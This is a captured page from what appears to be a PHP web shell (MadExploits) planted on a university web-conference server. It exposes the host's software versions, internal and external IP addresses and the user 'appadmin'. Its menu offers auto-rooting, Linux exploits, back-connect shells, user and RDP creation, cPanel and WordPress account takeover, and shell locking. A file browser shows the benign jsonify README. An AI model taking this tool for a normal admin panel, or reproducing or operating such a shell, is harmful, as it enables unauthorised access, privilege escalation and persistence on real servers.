Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.145.81.47
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
node-jsonify /
[ HOME SHELL ]
Name
Size
Permission
Action
README.markdown
972
B
-rw-r--r--
changelog.Debian.gz
160
B
-rw-r--r--
copyright
454
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.markdown
jsonify ======= This module provides Douglas Crockford's JSON implementation without modifying any globals. `stringify` and `parse` are merely exported without respect to whether or not a global `JSON` object exists. methods ======= var json = require('jsonify'); json.parse(source, reviver) --------------------------- Return a new javascript object from a parse of the `source` string. If a `reviver` function is specified, walk the structure passing each name/value pair to `reviver.call(parent, key, value)` to transform the `value` before parsing it. json.stringify(value, replacer, space) -------------------------------------- Return a string representation for `value`. If `replacer` is specified, walk the structure passing each name/value pair to `replacer.call(parent, key, value)` to transform the `value` before stringifying it. If `space` is a number, indent the result by that many spaces. If `space` is a string, use `space` as the indentation.
Close